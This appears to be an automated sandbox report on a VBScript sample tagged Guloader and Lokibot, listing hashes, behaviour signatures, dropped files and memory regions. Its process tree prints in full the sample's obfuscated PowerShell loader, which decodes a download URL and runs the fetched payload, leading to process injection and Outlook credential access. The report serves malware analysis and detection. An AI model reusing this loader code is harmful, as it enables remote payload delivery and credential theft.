Overview

overview

10

Static

static

1

f8e3cac8de...7a.vbs

windows7-x64

10

f8e3cac8de...7a.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    29/03/2024, 02:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f8e3cac8de2e01c04c8fcf7dd92d9c3187a5a53e40b9c22e4be574bd71217a7a.vbs

  • Size

    178KB

  • MD5

    7b01307279c1999f5cc654f75f4d7256

  • SHA1

    c6c3c841ca9448c605bae111b74a3d1f9b84788b

  • SHA256

    f8e3cac8de2e01c04c8fcf7dd92d9c3187a5a53e40b9c22e4be574bd71217a7a

  • SHA512

    01e1c07910f9a0ac077a0c61e27df9af7d90d9070e6cfcdfa1356b78fa608d26b19bafd84f325595c1b1306cec9aebadfffafcabe47639d1b49bbb90eb1cf733

  • SSDEEP

    3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hy3:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVQ

Score
10/10
guloaderlokibotcollectiondownloaderspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f8e3cac8de2e01c04c8fcf7dd92d9c3187a5a53e40b9c22e4be574bd71217a7a.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sugernes Frimrkesamler bibelskolen Rezoned kolonialist Trskreriers Rentemarginal #>;$Serafiskes239=(cmd /c set /A 115^^0);Function Joysome ([String]$Arbejdsbeholdningerne){$Serafiskes239=[char][int]$Serafiskes239;$Tiltyard=$Serafiskes239+'ubstring';$Grasserie=8;$Dichroite=Macrodactyl($Arbejdsbeholdningerne);For($Idyls=7; $Idyls -lt $Dichroite; $Idyls+=$Grasserie){$Katakinesis=$Arbejdsbeholdningerne.$Tiltyard.Invoke($Idyls, 1);$Travers=$Travers+$Katakinesis;}$Travers;}function Tatovrens ($Balancekontoens){& ($Bristefrdige) ($Balancekontoens);}function Macrodactyl ([String]$Motorism){$pronounce=$Motorism.Length-1;$pronounce;}$betalingsdagenes=Joysome 'NonvitaTPalaeenr LewiunaGorillan Supr msHo,gastfOverskueStalagmrNonequar Ro.anciFoo falnZyz.yvagRoomtht ';$Fyldte=Joysome 'Frem,ykhSkuldertstivmewtDamfoolpAnalysesGramino:Convoca/Microso/DilapiddScenegurE,velopiLevelhevE hanimeKnoglem.Knit,ergSpdest.o Ye.ggeoRek,isigTrmlksfl SiphoneUnpursu.HostesscRgerri.oMsurklimChemica/UnremituSpotpricDeified? rnevreesek,ionxu ansagpRentesroUntunabrPreinfltS.lvbyg= P,ogradPudi,uno LetvgtwBrutalinnong.rrlHaandfuo Pas,iaaBortsl.dJe.nban&NonprogiPrser,adPlis ys=Svineri1Moenste4PatholoA D sespvdeltaetSStammefcFormaliQYtreal.tFed.kirTSnobbisVEvaporaRjaill kC AmbuscD Unrespn Crissa7RagglesXPlanuriJDoitkinJParabolBVi.coelNUdlufteeNe.sigeGRecrystiEut cia1nonfrag-Un estoYCollo.uNIncumb.nCaution- ProletGBisksspqTokenis4KapitalMSgeproc ';$Bristefrdige=Joysome ' Vekseli Direk eSmaahanxOpaques ';$Sandboxes12=Joysome 'Sgaaend$SurrealgMedundelBrawestoUdsgtunb Ou towaDiabetelSatyrsp:IdeelledOnsdageobordenemGerman.ireint,mnfierasfodilat tbAnemarirsne,oldi TilstakSlaggink Kv.ntiefrihavnrUn ubronHesychaeMultisu Flaade=Postink kommandSBronzittA grelsaNappendrBagkldnt Stande-MultiplBPle,ishiEdriopht Ha.rdhs BestyrT S olelr FumledaUdvejninM ijasjsKartotefStatureehearthrr Exaspe Po,rcon-StimulaSDingeyso Inte cuBehovsurMoe,klac Kirke.e Procul Aff.rin$brevsamFTirithnyForhan,lWarmuppdHalefintMysticeeM,rkeds Alie.at-FormuleDSid,line,lapscuslivsenet F akkei TyvtesnCurbstoaF.mresptR dilatiBanke.doSt atagn Brnd.v Fors.s$h skendHDanskfde Pilm.exHornsgio Godkenn ForbruiPopsyigcReswea ';Tatovrens (Joysome 'Poa.hie$raff.negK mmunelPailleto Bal anbDkningsaSubalg,lUndef,c:ExplicaHent,moleConcannxKommunaoVok.enbnBalan.piBaad,skcA,garot= En,vol$PregrateBoreplanCo.orisvHolleri: Hangara unclutp Pu verp Vivos dTunnellaFlauntetha dlefaamorous ') ;Tatovrens (Joysome 'Ko sekvIProgenimTelefonpOverfrsoHypercurFulzient Fabula-DisilicMAmuserfoEjestedd TeknikuCollyrilGemmeleeSpid,vi oanmodBI,validiFlooragtN npartsmal.rneTIntensarRegistea Maln tn DonoresKnsfo.dfScrappieIn.rigirSa tour ') ;$Hexonic=$Hexonic+'\Tronflgere.Fil' ;Tatovrens (Joysome ' Palpul$NvnesfigA.cederlAvellano SolenobDomin xa.mfitealHoo.sbe:JoculatKLavmaalaUnsavorr.brotintFeminiso brigittBrneopselacinifkBomoliesBookingsHjulkrotWhiteflrLorr suuVampy,dk vlesgrtEksplosuIllegalr ante osSilketr5Graplin8 Fixa i=Frostsi(SourcenTOvertopeKanawarsForhandtLegende-HeltalsPrec uitaSkruebotLnen,eshHindbrr Stavbl$NingpoaH JorieaeSadelmax RefornoSmaakdpnunja,aniGlarmescRedning) Gniere ') ;while (-not $Kartoteksstrukturs58) {Tatovrens (Joysome 'ChristiI Chittafzoacumu Realis (Exorciz$Skom,gedReguleroStockinmRummaali ,ladbanB.aamuso,fsbninbF,eskoer Da.aeliBecensekPaido.okSportabe FeatisrCaperwonCon.ecteA derst.SignalfJForstvnoSulliedbAburaboSSparklit Photo aDign fitStepmineSemicre Sprls,e-Sp.aucheVambracqtaktl h Wonder.$BlomkaabUb.rmhje NightgtAmpliata KoblerlUnderb iDelprocn SlappegHje,nessSuccincdKontorhaTovsopigPlay,ffePumpkinnBulgarieInfantisMellerb) Punkis Le.otho{ .prinkSTidsvr.tOvergivaHgtningr,ornmout Hyperb-AtaghanSalligatlSlikkenetaskense VenskapOverstr Trange1Trevesk}RangskaeAb.eptil gruellsRve elseHeksame{ThermopSPeptidotvespaapaUnequalrRetakestTronhim- bahamaSJobmanclpelsbereL nieste KlyngepPulveri beslag1Aarsvrk;Zai.ersTComputea korreltNoblesso aismatvTumore.rDis.ocaeLigk.stnFashio.sCh ysoc underho$PredivoS RedaktaSkrivesnLuksusjdLbskkrsbJuramenoSk.ffemxKongefaeRaamorbsTangalo1Vante,s2 Passif} Trlast ');Tatovrens (Joysome 'Salgsch$EvidentgVedligelKoo dinoopdi,teb Skruk.aLynchenlSang,ai:Fdsel dKKritisaaEthiop r elek rtPlasmomoSchattet Smrbire ubclinkFremskas ForuresPinnocktHydrargr FishwiuFrontosk PrefratObituaruFriluftrChloritsCetenee5 Frdigk8 Intrad=Monosym(NaughtiT Fr.dnieHoist ns TidsfltSkrmmev-Rafleb,PGsteproaDiamanttDecrepih Tempor semibul$HandfulHEarthwaeLinelikxDecongeoAsmin sn HankeliUnoratocMa chen)pseu,oo ') ;}Tatovrens (Joysome 'nonmedi$TribromgMappemolgiraffloCor entb tritoratantal.lInf.nit:SubstanU ZoltannPrebellnBoge,seiPaahngsmhanoverbLurchinlAccollse TilhrenSiriasiedextrors Testims indbru Earmark=Brsspek ,nclashG CommeneAversiot arshbe-Tils,anCVold.ifo Dra.lenPas.usstBejdspae Stal fnOverf.ltSemibur Vatika$DelmngdH Undecle KoensrxNonpondoPertlinnSocialfiForbytnc,ruttor ');Tatovrens (Joysome 'Anamnio$EserinegOutsweelOffensioConopopbDilat,raRnneboelcolu.bi: MadagaAOmniferpSkilsmioPeri,eltClayineep.keredkNonsusceFlirtatt fd els Telt.ol= Transv Simoni[FarvetaSDistan.yAntiphos Begribt Snrke,e pindsvmBotanis.StjniveCSu.erseoTrommernGrillecvOrki.xjeSlagentrTemperat Mikrof] Ligefr:Mammeys: LokaliFTimetalr Drejebo TreebimDegressBRoundela KtterasLymphaneDagpeng6Unveils4Imper,iSgente ntEnco parFornorsiIrrigatnGennemlgS uderi(Posnani$ AdevisUCopymannSlgtsrenFyldplaiGimmickmvolplanboddernel CalcimePube,aln GrnseeePhyllossScob.ntsSynkop.) ,trava ');Tatovrens (Joysome ' Sko.ne$Chemothg ForesklJolleymoTje.estbNrbilleasu,furil Landsr:Derind DLatterbi GabardoOntolo.sSa tiesp.avallay Condenr UrsicioM,ndates Organi Vognt g=Slkke,t Krympe[AmontilSConsangy,ambarusLggetcrtNaaleneeOlds.ylmgazetsk.IdentitT T talfe Hil ryx.icuspitLuftvej.UnspiraE H.moeonpilote,cErgo.omocommendd PulpieiS.ntonin Forkasg Transp]sandorm:presign:BlandsdA,innatiSProthalC UnderfIDistribIPhotoge.natu.faGStindspe Be tmatO,erflaSTidsnoetJesuitsrRu alisiSpydblanPayrol gmarnies(Havee,e$GasbehoAGuarantp Opgaveo Dybfr t MongoleUnderstk sbesteXanthiutHovedsp)Ottweil ');Tatovrens (Joysome 'Viscero$fremkalgLambyacltsemidloSmooricbGriz,leapecksnilUnpreci: Fu.dstRLyolytio Kr.gsgbskraaskiPuncticnPlagsomsBetonhooDisrespn Laparoa Dem,aud UtricleMiljk,asRefree = Vent s$ ,eportDGlottaliEned.reoSlyngbos Chaisep ForsknyUopholdrFloppyso Sand.isPhra er.SterlansSluiceluPhantopbKelt sksE uitabtcol,ybirFrdselsiLette.fnFjeldryg Tjurhn(Perdil.3 Ngstem0Foreswe5Miscond1Suf,ict9huledee8Fyldepe,Gardinp3Hemmeli2Hofmars5Isdanne7Empover9klagefr) Non ev ');Tatovrens $Robinsonades;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:3028
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Sugernes Frimrkesamler bibelskolen Rezoned kolonialist Trskreriers Rentemarginal #>;$Serafiskes239=(cmd /c set /A 115^^0);Function Joysome ([String]$Arbejdsbeholdningerne){$Serafiskes239=[char][int]$Serafiskes239;$Tiltyard=$Serafiskes239+'ubstring';$Grasserie=8;$Dichroite=Macrodactyl($Arbejdsbeholdningerne);For($Idyls=7; $Idyls -lt $Dichroite; $Idyls+=$Grasserie){$Katakinesis=$Arbejdsbeholdningerne.$Tiltyard.Invoke($Idyls, 1);$Travers=$Travers+$Katakinesis;}$Travers;}function Tatovrens ($Balancekontoens){& ($Bristefrdige) ($Balancekontoens);}function Macrodactyl ([String]$Motorism){$pronounce=$Motorism.Length-1;$pronounce;}$betalingsdagenes=Joysome 'NonvitaTPalaeenr LewiunaGorillan Supr msHo,gastfOverskueStalagmrNonequar Ro.anciFoo falnZyz.yvagRoomtht ';$Fyldte=Joysome 'Frem,ykhSkuldertstivmewtDamfoolpAnalysesGramino:Convoca/Microso/DilapiddScenegurE,velopiLevelhevE hanimeKnoglem.Knit,ergSpdest.o Ye.ggeoRek,isigTrmlksfl SiphoneUnpursu.HostesscRgerri.oMsurklimChemica/UnremituSpotpricDeified? rnevreesek,ionxu ansagpRentesroUntunabrPreinfltS.lvbyg= P,ogradPudi,uno LetvgtwBrutalinnong.rrlHaandfuo Pas,iaaBortsl.dJe.nban&NonprogiPrser,adPlis ys=Svineri1Moenste4PatholoA D sespvdeltaetSStammefcFormaliQYtreal.tFed.kirTSnobbisVEvaporaRjaill kC AmbuscD Unrespn Crissa7RagglesXPlanuriJDoitkinJParabolBVi.coelNUdlufteeNe.sigeGRecrystiEut cia1nonfrag-Un estoYCollo.uNIncumb.nCaution- ProletGBisksspqTokenis4KapitalMSgeproc ';$Bristefrdige=Joysome ' Vekseli Direk eSmaahanxOpaques ';$Sandboxes12=Joysome 'Sgaaend$SurrealgMedundelBrawestoUdsgtunb Ou towaDiabetelSatyrsp:IdeelledOnsdageobordenemGerman.ireint,mnfierasfodilat tbAnemarirsne,oldi TilstakSlaggink Kv.ntiefrihavnrUn ubronHesychaeMultisu Flaade=Postink kommandSBronzittA grelsaNappendrBagkldnt Stande-MultiplBPle,ishiEdriopht Ha.rdhs BestyrT S olelr FumledaUdvejninM ijasjsKartotefStatureehearthrr Exaspe Po,rcon-StimulaSDingeyso Inte cuBehovsurMoe,klac Kirke.e Procul Aff.rin$brevsamFTirithnyForhan,lWarmuppdHalefintMysticeeM,rkeds Alie.at-FormuleDSid,line,lapscuslivsenet F akkei TyvtesnCurbstoaF.mresptR dilatiBanke.doSt atagn Brnd.v Fors.s$h skendHDanskfde Pilm.exHornsgio Godkenn ForbruiPopsyigcReswea ';Tatovrens (Joysome 'Poa.hie$raff.negK mmunelPailleto Bal anbDkningsaSubalg,lUndef,c:ExplicaHent,moleConcannxKommunaoVok.enbnBalan.piBaad,skcA,garot= En,vol$PregrateBoreplanCo.orisvHolleri: Hangara unclutp Pu verp Vivos dTunnellaFlauntetha dlefaamorous ') ;Tatovrens (Joysome 'Ko sekvIProgenimTelefonpOverfrsoHypercurFulzient Fabula-DisilicMAmuserfoEjestedd TeknikuCollyrilGemmeleeSpid,vi oanmodBI,validiFlooragtN npartsmal.rneTIntensarRegistea Maln tn DonoresKnsfo.dfScrappieIn.rigirSa tour ') ;$Hexonic=$Hexonic+'\Tronflgere.Fil' ;Tatovrens (Joysome ' Palpul$NvnesfigA.cederlAvellano SolenobDomin xa.mfitealHoo.sbe:JoculatKLavmaalaUnsavorr.brotintFeminiso brigittBrneopselacinifkBomoliesBookingsHjulkrotWhiteflrLorr suuVampy,dk vlesgrtEksplosuIllegalr ante osSilketr5Graplin8 Fixa i=Frostsi(SourcenTOvertopeKanawarsForhandtLegende-HeltalsPrec uitaSkruebotLnen,eshHindbrr Stavbl$NingpoaH JorieaeSadelmax RefornoSmaakdpnunja,aniGlarmescRedning) Gniere ') ;while (-not $Kartoteksstrukturs58) {Tatovrens (Joysome 'ChristiI Chittafzoacumu Realis (Exorciz$Skom,gedReguleroStockinmRummaali ,ladbanB.aamuso,fsbninbF,eskoer Da.aeliBecensekPaido.okSportabe FeatisrCaperwonCon.ecteA derst.SignalfJForstvnoSulliedbAburaboSSparklit Photo aDign fitStepmineSemicre Sprls,e-Sp.aucheVambracqtaktl h Wonder.$BlomkaabUb.rmhje NightgtAmpliata KoblerlUnderb iDelprocn SlappegHje,nessSuccincdKontorhaTovsopigPlay,ffePumpkinnBulgarieInfantisMellerb) Punkis Le.otho{ .prinkSTidsvr.tOvergivaHgtningr,ornmout Hyperb-AtaghanSalligatlSlikkenetaskense VenskapOverstr Trange1Trevesk}RangskaeAb.eptil gruellsRve elseHeksame{ThermopSPeptidotvespaapaUnequalrRetakestTronhim- bahamaSJobmanclpelsbereL nieste KlyngepPulveri beslag1Aarsvrk;Zai.ersTComputea korreltNoblesso aismatvTumore.rDis.ocaeLigk.stnFashio.sCh ysoc underho$PredivoS RedaktaSkrivesnLuksusjdLbskkrsbJuramenoSk.ffemxKongefaeRaamorbsTangalo1Vante,s2 Passif} Trlast ');Tatovrens (Joysome 'Salgsch$EvidentgVedligelKoo dinoopdi,teb Skruk.aLynchenlSang,ai:Fdsel dKKritisaaEthiop r elek rtPlasmomoSchattet Smrbire ubclinkFremskas ForuresPinnocktHydrargr FishwiuFrontosk PrefratObituaruFriluftrChloritsCetenee5 Frdigk8 Intrad=Monosym(NaughtiT Fr.dnieHoist ns TidsfltSkrmmev-Rafleb,PGsteproaDiamanttDecrepih Tempor semibul$HandfulHEarthwaeLinelikxDecongeoAsmin sn HankeliUnoratocMa chen)pseu,oo ') ;}Tatovrens (Joysome 'nonmedi$TribromgMappemolgiraffloCor entb tritoratantal.lInf.nit:SubstanU ZoltannPrebellnBoge,seiPaahngsmhanoverbLurchinlAccollse TilhrenSiriasiedextrors Testims indbru Earmark=Brsspek ,nclashG CommeneAversiot arshbe-Tils,anCVold.ifo Dra.lenPas.usstBejdspae Stal fnOverf.ltSemibur Vatika$DelmngdH Undecle KoensrxNonpondoPertlinnSocialfiForbytnc,ruttor ');Tatovrens (Joysome 'Anamnio$EserinegOutsweelOffensioConopopbDilat,raRnneboelcolu.bi: MadagaAOmniferpSkilsmioPeri,eltClayineep.keredkNonsusceFlirtatt fd els Telt.ol= Transv Simoni[FarvetaSDistan.yAntiphos Begribt Snrke,e pindsvmBotanis.StjniveCSu.erseoTrommernGrillecvOrki.xjeSlagentrTemperat Mikrof] Ligefr:Mammeys: LokaliFTimetalr Drejebo TreebimDegressBRoundela KtterasLymphaneDagpeng6Unveils4Imper,iSgente ntEnco parFornorsiIrrigatnGennemlgS uderi(Posnani$ AdevisUCopymannSlgtsrenFyldplaiGimmickmvolplanboddernel CalcimePube,aln GrnseeePhyllossScob.ntsSynkop.) ,trava ');Tatovrens (Joysome ' Sko.ne$Chemothg ForesklJolleymoTje.estbNrbilleasu,furil Landsr:Derind DLatterbi GabardoOntolo.sSa tiesp.avallay Condenr UrsicioM,ndates Organi Vognt g=Slkke,t Krympe[AmontilSConsangy,ambarusLggetcrtNaaleneeOlds.ylmgazetsk.IdentitT T talfe Hil ryx.icuspitLuftvej.UnspiraE H.moeonpilote,cErgo.omocommendd PulpieiS.ntonin Forkasg Transp]sandorm:presign:BlandsdA,innatiSProthalC UnderfIDistribIPhotoge.natu.faGStindspe Be tmatO,erflaSTidsnoetJesuitsrRu alisiSpydblanPayrol gmarnies(Havee,e$GasbehoAGuarantp Opgaveo Dybfr t MongoleUnderstk sbesteXanthiutHovedsp)Ottweil ');Tatovrens (Joysome 'Viscero$fremkalgLambyacltsemidloSmooricbGriz,leapecksnilUnpreci: Fu.dstRLyolytio Kr.gsgbskraaskiPuncticnPlagsomsBetonhooDisrespn Laparoa Dem,aud UtricleMiljk,asRefree = Vent s$ ,eportDGlottaliEned.reoSlyngbos Chaisep ForsknyUopholdrFloppyso Sand.isPhra er.SterlansSluiceluPhantopbKelt sksE uitabtcol,ybirFrdselsiLette.fnFjeldryg Tjurhn(Perdil.3 Ngstem0Foreswe5Miscond1Suf,ict9huledee8Fyldepe,Gardinp3Hemmeli2Hofmars5Isdanne7Empover9klagefr) Non ev ');Tatovrens $Robinsonades;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1432
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:1464
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:2436

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        acf6599e16905895532c02b0acc0173f

        SHA1

        23c3ed9433b9c01ce340b244340f4882259adcd6

        SHA256

        1bf756074cdeb8a2e30b4af3d759ae2ec9ff105cf496bd6ff4dbe74d898ad23c

        SHA512

        9d6c4f2bc040c5fa78a8d9d849b2621f69b170985364873ceb0a75b7ba9583b08c0c3fe9639df265e019c8f56a7c350c9c4309cadc7036e997142a912d902fc1

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        77f4aff01e13b0fceb671e0d31b3007f

        SHA1

        8606e9dc7351c2cf08cd00b1aa92bb6e928057e6

        SHA256

        ce9063ca7526e46d83cf4c33a27b502be6d775362e2b515144407821f67700af

        SHA512

        768714203c18acab269e44dfefc66923d3a886fc34834a9836e4f159d0053a814bbcd51fd0a5fefd15a2a819280229b98df9496d05dbb0097649b7b32d88c093

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Cab9241.tmp
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Forlagde.txt
        Filesize

        3KB

        MD5

        fb201198683c51cae72e03e19cdb6a8b

        SHA1

        ad45c4069609ee7450fcff72647de71004d9cea5

        SHA256

        54f87ff637150ac2c052db7fe4212b809e0f898a34c2e45718ce11b31437fb33

        SHA512

        8288dffb124a09c34c1de500c6f1b6bbb6d65e611f903b9f504c284b54c940990661cf5056d9c22c53ac6128b7f39bad0876df5e8f192352f7a9005b0f886689

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Forlagde.txt
        Filesize

        5KB

        MD5

        90d14bf6eaae03816cf0528c88025d78

        SHA1

        9899b7ba5d48d92c881d276e58524e4e4ca589c1

        SHA256

        e3d6e6df540588734e8323ddd8af6d7d77aa0bfc77e8f26e36cd9e49522ba18f

        SHA512

        b4992c08cedee1c3bd6b0611abc058e800ce8dcca9f29c025d1db8bdccaa413c5d4ee4ab08bf2fa7763dff55e17c531729f04f7b0ecfae65a9c637cc544ddcaf

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Forlagde.txt
        Filesize

        2KB

        MD5

        b4208a7e78e01f6dff6d8f55e75f9d04

        SHA1

        5faeaf941a94841309ecd00001b3bf248c7186bb

        SHA256

        25e56d3ad767f6a3d0d0484eb89a4703ab1f0c604978be192e357abeda36c62f

        SHA512

        1fcdccf5e5d4dfe29f72f5ce7fe0a73d54fc407660b0894bce9cb9483d55ed7d774091462b7c95a481165c445c901bb97741f797a9be28aac985c06dc1ce0217

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Tar9ACA.tmp
        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2461186416-2307104501-1787948496-1000\0f5007522459c86e95ffcc62f32308f1_0f07e186-1bdc-490d-8c6e-7c4aeae2b85a
        Filesize

        46B

        MD5

        d898504a722bff1524134c6ab6a5eaa5

        SHA1

        e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

        SHA256

        878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

        SHA512

        26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2461186416-2307104501-1787948496-1000\0f5007522459c86e95ffcc62f32308f1_0f07e186-1bdc-490d-8c6e-7c4aeae2b85a
        Filesize

        46B

        MD5

        c07225d4e7d01d31042965f048728a0a

        SHA1

        69d70b340fd9f44c89adb9a2278df84faa9906b7

        SHA256

        8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

        SHA512

        23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VSKRXDME4XVK4VRGI62D.temp
        Filesize

        7KB

        MD5

        32bf364cd28f6f62b6dc01ca0e620ea3

        SHA1

        649ad726cc883d853b907adab08027b130b16f9c

        SHA256

        c1b0c0f4e66863f73a8e52853d8be741f638444bae22a41045c6d8d9d80b50d8

        SHA512

        9174367cefcc93bbfd014aafebf0b19c152516101e760e2fbc7bc9f5b22b74d1884db67590fb51e74cf7296672644abecacc6d1631685cf78da230052e287ab0

        Download Submit

      • memory/1432-301-0x0000000073550000-0x0000000073AFB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1432-300-0x00000000026B0000-0x00000000026F0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1432-299-0x0000000006310000-0x000000000C032000-memory.dmp

        Filesize

        93.1MB

        Download

      • memory/1432-294-0x00000000026B0000-0x00000000026F0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1432-303-0x0000000005E90000-0x0000000005F90000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1432-298-0x0000000005190000-0x0000000005191000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1432-278-0x0000000073550000-0x0000000073AFB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1432-279-0x00000000026B0000-0x00000000026F0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1432-297-0x0000000073550000-0x0000000073AFB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1432-281-0x00000000026B0000-0x00000000026F0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1432-304-0x0000000077510000-0x00000000776B9000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1432-305-0x0000000077700000-0x00000000777D6000-memory.dmp

        Filesize

        856KB

        Download

      • memory/1432-295-0x0000000005E90000-0x0000000005F90000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1492-276-0x0000000002600000-0x0000000002680000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1492-343-0x000007FEF4AB0000-0x000007FEF544D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1492-280-0x0000000002600000-0x0000000002680000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1492-277-0x000007FEF4AB0000-0x000007FEF544D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1492-273-0x000007FEF4AB0000-0x000007FEF544D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1492-272-0x00000000025D0000-0x00000000025E2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/1492-271-0x00000000028D0000-0x00000000028F2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1492-270-0x0000000002600000-0x0000000002680000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1492-269-0x00000000023B0000-0x00000000023B8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1492-268-0x0000000002600000-0x0000000002680000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1492-293-0x0000000002600000-0x0000000002680000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1492-264-0x000007FEF4AB0000-0x000007FEF544D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1492-265-0x0000000002600000-0x0000000002680000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1492-267-0x000000001B160000-0x000000001B442000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1492-266-0x000007FEF4AB0000-0x000007FEF544D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2436-306-0x0000000077510000-0x00000000776B9000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/2436-331-0x0000000000760000-0x0000000006482000-memory.dmp

        Filesize

        93.1MB

        Download

      • memory/2436-334-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2436-335-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2436-336-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2436-337-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2436-338-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

